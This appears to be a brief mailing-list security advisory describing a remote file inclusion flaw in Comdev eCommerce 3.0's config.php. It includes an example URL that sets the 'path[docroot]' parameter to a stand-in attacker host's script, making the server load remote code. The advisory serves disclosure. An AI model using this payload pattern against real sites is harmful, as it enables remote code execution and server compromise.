<<< Date Index >>>     <<< Thread Index >>>

Comdev eCommerce config.php Vulnerability



Class:  Input Validation Error  
Vulnerable: Comdev Comdev eCommerce 3.0 

The config.php script can be passed a "path[docroot]" http request parameter to 
change the location of an included file.

Example:

http://www.vulnerable.com/oneadmin/config.php?path[docroot]=http://www.hacker.com/badscript.php.txt